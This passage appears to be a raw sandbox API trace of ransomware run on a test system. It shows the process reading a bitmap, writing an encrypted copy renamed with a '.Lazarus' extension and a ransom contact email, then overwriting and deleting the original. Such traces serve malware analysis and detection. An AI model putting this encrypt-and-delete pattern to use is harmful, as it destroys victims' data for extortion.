dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0081.209] GetFileType (hFile=0x428) returned 0x1 [0081.209] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0081.209] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0081.209] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0081.210] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0081.210] CloseHandle (hObject=0x428) returned 1 [0081.210] AreFileApisANSI () returned 1 [0081.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0081.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6d2c0 [0081.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x6d2c0, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 39 [0081.210] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SplashScreen.bmp" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0081.210] GetFileType (hFile=0x428) returned 0x1 [0081.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0081.210] CloseHandle (hObject=0x428) returned 1 [0081.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0081.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0081.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0081.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0081.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0081.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0081.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0081.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0081.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0081.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0081.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0081.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0081.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0081.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0081.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0081.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0081.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0081.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0081.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0081.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0081.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0081.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0081.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0081.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0081.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0081.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0081.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0081.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0081.211] AreFileApisANSI () returned 1 [0081.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0081.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6d4d0 [0081.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x6d4d0, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 39 [0081.211] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\SplashScreen.bmp" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0xa078)) returned 1 [0081.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0081.211] AreFileApisANSI () returned 1 [0081.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0081.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0081.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0081.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0081.212] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0081.212] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0081.212] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0081.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0081.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0081.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0081.212] GetLastError () returned 0x0 [0081.212] SetLastError (dwErrCode=0x0) [0081.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e3b0 [0081.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0081.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b9c8 [0081.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0081.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d630 [0081.212] GetLastError () returned 0x0 [0081.212] SetLastError (dwErrCode=0x0) [0081.212] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0081.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0081.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x69300 [0081.212] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0081.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76200 [0081.212] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0081.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0081.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0081.213] AreFileApisANSI () returned 1 [0081.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76200, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 101 [0081.213] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xca) returned 0x73ff8 [0081.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76200, cbMultiByte=-1, lpWideCharStr=0x73ff8, cchWideChar=101 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SplashScreen.bmp.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 101 [0081.213] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SplashScreen.bmp.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0081.213] GetFileType (hFile=0x428) returned 0x1 [0081.213] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x73ff8 | out: hHeap=0x20000) returned 1 [0081.213] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0081.213] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0081.213] AreFileApisANSI () returned 1 [0081.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0081.213] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6d108 [0081.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x6d108, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 39 [0081.214] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SplashScreen.bmp" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0081.214] GetFileType (hFile=0x42c) returned 0x1 [0081.214] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0081.214] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69db0 [0081.214] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0081.214] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0081.214] GetLastError () returned 0x0 [0081.214] SetLastError (dwErrCode=0x0) [0081.214] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0081.214] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0081.214] GetLastError () returned 0x0 [0081.214] SetLastError (dwErrCode=0x0) [0081.214] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0081.214] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0081.214] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0081.214] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0081.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0081.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d738 [0081.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4f220 [0081.216] GetLastError () returned 0x0 [0081.216] SetLastError (dwErrCode=0x0) [0081.217] GetLastError () returned 0x0 [0081.217] SetLastError (dwErrCode=0x0) [0081.217] GetLastError () returned 0x0 [0081.217] SetLastError (dwErrCode=0x0) [0081.217] GetLastError () returned 0x0 [0081.217] SetLastError (dwErrCode=0x0) [0081.217] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.217] WriteFile (in: hFile=0x428, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.218] GetLastError () returned 0x0 [0081.218] SetLastError (dwErrCode=0x0) [0081.218] GetLastError () returned 0x0 [0081.218] SetLastError (dwErrCode=0x0) [0081.218] GetLastError () returned 0x0 [0081.218] SetLastError (dwErrCode=0x0) [0081.219] GetLastError () returned 0x0 [0081.219] SetLastError (dwErrCode=0x0) [0081.219] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.219] WriteFile (in: hFile=0x428, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.219] GetLastError () returned 0x0 [0081.219] SetLastError (dwErrCode=0x0) [0081.219] GetLastError () returned 0x0 [0081.219] SetLastError (dwErrCode=0x0) [0081.219] GetLastError () returned 0x0 [0081.219] SetLastError (dwErrCode=0x0) [0081.220] GetLastError () returned 0x0 [0081.220] SetLastError (dwErrCode=0x0) [0081.220] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.220] WriteFile (in: hFile=0x428, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.220] GetLastError () returned 0x0 [0081.220] SetLastError (dwErrCode=0x0) [0081.220] GetLastError () returned 0x0 [0081.220] SetLastError (dwErrCode=0x0) [0081.220] GetLastError () returned 0x0 [0081.220] SetLastError (dwErrCode=0x0) [0081.220] GetLastError () returned 0x0 [0081.220] SetLastError (dwErrCode=0x0) [0081.221] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.221] WriteFile (in: hFile=0x428, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.221] GetLastError () returned 0x0 [0081.221] SetLastError (dwErrCode=0x0) [0081.221] GetLastError () returned 0x0 [0081.221] SetLastError (dwErrCode=0x0) [0081.221] GetLastError () returned 0x0 [0081.221] SetLastError (dwErrCode=0x0) [0081.221] GetLastError () returned 0x0 [0081.221] SetLastError (dwErrCode=0x0) [0081.221] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.222] WriteFile (in: hFile=0x428, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.222] GetLastError () returned 0x0 [0081.222] SetLastError (dwErrCode=0x0) [0081.222] GetLastError () returned 0x0 [0081.222] SetLastError (dwErrCode=0x0) [0081.222] GetLastError () returned 0x0 [0081.222] SetLastError (dwErrCode=0x0) [0081.222] GetLastError () returned 0x0 [0081.222] SetLastError (dwErrCode=0x0) [0081.222] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.223] WriteFile (in: hFile=0x428, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.223] GetLastError () returned 0x0 [0081.223] SetLastError (dwErrCode=0x0) [0081.223] GetLastError () returned 0x0 [0081.223] SetLastError (dwErrCode=0x0) [0081.223] GetLastError () returned 0x0 [0081.223] SetLastError (dwErrCode=0x0) [0081.223] GetLastError () returned 0x0 [0081.223] SetLastError (dwErrCode=0x0) [0081.223] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.223] WriteFile (in: hFile=0x428, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.224] GetLastError () returned 0x0 [0081.224] SetLastError (dwErrCode=0x0) [0081.224] GetLastError () returned 0x0 [0081.224] SetLastError (dwErrCode=0x0) [0081.224] GetLastError () returned 0x0 [0081.224] SetLastError (dwErrCode=0x0) [0081.224] GetLastError () returned 0x0 [0081.224] SetLastError (dwErrCode=0x0) [0081.224] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.224] WriteFile (in: hFile=0x428, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.224] GetLastError () returned 0x0 [0081.225] SetLastError (dwErrCode=0x0) [0081.225] GetLastError () returned 0x0 [0081.225] SetLastError (dwErrCode=0x0) [0081.225] GetLastError () returned 0x0 [0081.225] SetLastError (dwErrCode=0x0) [0081.225] GetLastError () returned 0x0 [0081.225] SetLastError (dwErrCode=0x0) [0081.225] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.225] WriteFile (in: hFile=0x428, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.225] GetLastError () returned 0x0 [0081.225] SetLastError (dwErrCode=0x0) [0081.226] GetLastError () returned 0x0 [0081.226] SetLastError (dwErrCode=0x0) [0081.226] GetLastError () returned 0x0 [0081.226] SetLastError (dwErrCode=0x0) [0081.226] GetLastError () returned 0x0 [0081.226] SetLastError (dwErrCode=0x0) [0081.226] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x78, lpOverlapped=0x0) returned 1 [0081.226] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0081.226] WriteFile (in: hFile=0x428, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.226] GetLastError () returned 0x0 [0081.226] SetLastError (dwErrCode=0x0) [0081.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0081.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5d0 [0081.226] GetLastError () returned 0x0 [0081.226] SetLastError (dwErrCode=0x0) [0081.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d738 | out: hHeap=0x20000) returned 1 [0081.227] WriteFile (in: hFile=0x428, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327ef70*=0x80, lpOverlapped=0x0) returned 1 [0081.227] GetLastError () returned 0x0 [0081.227] SetLastError (dwErrCode=0x0) [0081.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0081.227] GetLastError () returned 0x0 [0081.227] SetLastError (dwErrCode=0x0) [0081.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0081.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0081.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5d0 | out: hHeap=0x20000) returned 1 [0081.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0081.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0081.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0081.227] CloseHandle (hObject=0x428) returned 1 [0081.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0081.229] CloseHandle (hObject=0x42c) returned 1 [0081.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0081.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0081.229] AreFileApisANSI () returned 1 [0081.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0081.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6d4d0 [0081.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x6d4d0, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 39 [0081.229] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SplashScreen.bmp" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0081.230] GetFileType (hFile=0x42c) returned 0x1 [0081.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0081.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0081.231] GetLastError () returned 0xb7 [0081.231] SetLastError (dwErrCode=0xb7) [0081.231] WriteFile (in: hFile=0x42c, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0081.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0081.231] CloseHandle (hObject=0x42c) returned 1 [0081.232] AreFileApisANSI () returned 1 [0081.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0081.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6ce48 [0081.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x6ce48, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 39 [0081.232] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\SplashScreen.bmp" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp")) returned 1 [0081.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0081.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0081.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0081.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0081.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0081.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0081.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0081.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0081.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d630 | out: hHeap=0x20000) returned 1 [0081.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: 